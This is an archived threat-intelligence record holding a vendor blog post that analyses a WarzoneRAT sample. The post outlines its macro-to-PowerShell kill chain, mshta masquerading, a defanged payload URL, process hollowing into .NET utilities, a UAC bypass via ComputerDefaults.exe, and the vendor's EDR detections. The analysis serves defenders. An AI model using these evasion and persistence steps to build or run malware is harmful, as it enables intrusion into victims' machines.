{
	"id": "a445a0df-92d6-4e0d-9875-3a6827aa5203",
	"created_at": "2026-04-06T00:14:14.531568Z",
	"updated_at": "2026-04-10T13:12:20.975888Z",
	"deleted_at": null,
	"sha1_hash": "3a8a5c3949a5a4822a7598d2618046df5ccf1cc1",
	"title": "WarzoneRAT Can Now Evade Detection With Process Hollowing",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2453199,
	"plain_text": "WarzoneRAT Can Now Evade Detection With Process Hollowing\r\nBy Uptycs Threat Research\r\nPublished: 2022-05-31 · Archived: 2026-04-05 17:18:46 UTC\r\nResearch by: Pritam Salunkhe and Shilpesh Trivedi\r\nThe Uptycs Threat Research Team identified samples of WarzoneRAT dropped through a Powershell dropper with\r\na Process Injection/Hollowing technique implementation to bypass detections. We first identified WarzoneRAT\r\nusing a Windows User Account Control (UAC) bypass technique in November 2020.\r\nThis blog post details the operation of the latest WarzoneRAT sample and also covers the advanced detection\r\ncapabilities of the Uptycs EDR in detecting techniques like Process Hollowing and UAC Bypass.\r\nWarzoneRAT is a Remote Admin Tool that has a wide range of capabilities including keylogging, remote desktop,\r\nand webcam capture, live and offline keylogger. This malware is distributed through malware-as-a-service (MaaS)\r\nand is also used as a staged payload in the attack kill chain by threat actors in APT attacks.\r\nThe Uptycs Threat Research Team contributed to the profile of WarzoneRAT (S0670) in the MITRE ATT\u0026CK\r\nframework, detailing the techniques and functionality of the malware.\r\nMalware Operation\r\nA depiction of the kill chain used by WarzoneRAT in one of the recently captured samples in our in-house osquery\r\nintegrated threat intelligence sandbox is shown below (Figure 1).\r\nhttps://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing\r\nPage 1 of 7\n\nFigure 1: Attack Kill Chain of latest WarzoneRAT sample including process hollowing\r\nThe kill chain includes the following steps:\r\nThe malicious document launches EXCEL.exe and executes wscript.exe to run Update.js javascript which\r\nis embedded in the macro itself and copy the Update.js to Startup Folder.\r\nLater the JS script copies the mshta from C:\\Windows\\System32 to C:\\ProgramData\\ and names it as\r\n‘ddond.com’. It then launches ddond.com(masqueraded mshta) to execute\r\nhxxps://taxfile[.]mediafire[.]com/file/c3zcoq7ay6nq19i/back[.]htm/file.\r\nThe back.htm executed via ddond.com, runs powershell command to download another powershell script\r\nlater executing it via Invoke-Expression. And schedules a task using schtasks.exe for persistence.\r\nThe powershell script executed via Invoke-Expression executes embedded WarzoneRat and other .Net\r\nbinary payloads via process hollowing technique as shown in Figure 1.\r\nIt also launches csc.exe to compile .cs file on the fly into dll to decompress the compressed code for further\r\nexecution.\r\nESG Survey Report: Trends in cloud-native security, technology, and automation\r\nhttps://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing\r\nPage 2 of 7\n\nThe Uptycs detection graph showcasing the execution flow of the attack kill chain is shown below (Figure 2).\r\nFigure 2: Uptycs Detection graph of WarzoneRAT\r\nChain Process Hollowing Technique\r\nMITRE: https://attack.mitre.org/techniques/T1055/012/\r\nThe embedded macro inside the document\r\n(907012a9e2eff4291cd1162a0f2ac726f93bad0ef57e326d5767489e89bc0b0a) executed multiple set of commands\r\nto download a powershell script that loads the malicious executables using [Reflection.Assembly]::load cmdlet as\r\nshown in figure 3:\r\nhttps://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing\r\nPage 3 of 7\n\nFigure 3: Deobfuscated Powershell code using process injection in legit process\r\nThe cmdlet executes the function “Execute” from the Class “projFUD.PA”.\r\nThe “Execute” Function then uses process hollowing technique to inject malicious code into legit processes\r\nsuch as aspnet_compiler.exe, aspnet_regbrowsers.exe, CasPol.exe, RegAsm.exe and MSBuild.exe.\r\nThe API usage for the process hollowing is shown below (See Figure 4).\r\nhttps://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing\r\nPage 4 of 7\n\nFigure 4: Process Hollowing code in .NET payload\r\nUAC Bypass\r\nMITRE ATT\u0026CK: https://attack.mitre.org/techniques/T1548/002/ \r\nAlongside process hollowing and code injection, the Powershell script also injects another .NET payload\r\n(8A389D732476E581EA576999E0191142BB8324F708744260303C1D9CFE1A79AE) which performs UAC\r\nbypass via ComputerDefaults.exe.\r\nFigure 5: UAC Bypass implemented in .NET payload\r\nhttps://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing\r\nPage 5 of 7\n\nUptycs EDR Detection\r\nUptycs EDR armed with YARA process scanning, advanced detections and correlating Registry Events, Process\r\nFile Events, Process Events and API Events successfully detects different types of tactics carried out by\r\nWarzoneRAT.\r\nAdditionally, Uptycs EDR contextual detection provides additional details about the detected malware. Users can\r\nnavigate to the toolkit data section in the detection alert and click on the name to find out the behavior as shown as\r\nbelow (See Figure 6)\r\nFigure 6: Uptycs Detection for WarzoneRAT\r\nConclusion\r\nThis blog detailed the new WarzoneRAT operation on a victim's machine. We shed light on the new Process\r\nHollowing technique used to evade process-based defenses. This makes it necessary to have a security solution\r\nthat has advanced analytics and provides granular visibility of targeted attacks and their kill chain. Uptycs’ EDR\r\nwith advanced detection capabilities, correlation, and YARA process scanning capabilities successfully identified\r\nthe malicious behavior and detected WarzoneRAT.\r\nTo learn more about the latest threat research conducted by the Uptycs Team,\r\ncheck out our most recent threat bulletin below.\r\nhttps://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing\r\nPage 6 of 7\n\nSource: https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing\r\nhttps://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing"
	],
	"report_names": [
		"warzonerat-can-now-evade-with-process-hollowing"
	],
	"threat_actors": [],
	"ts_created_at": 1775434454,
	"ts_updated_at": 1775826740,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3a8a5c3949a5a4822a7598d2618046df5ccf1cc1.pdf",
		"text": "https://archive.orkl.eu/3a8a5c3949a5a4822a7598d2618046df5ccf1cc1.txt",
		"img": "https://archive.orkl.eu/3a8a5c3949a5a4822a7598d2618046df5ccf1cc1.jpg"
	}
}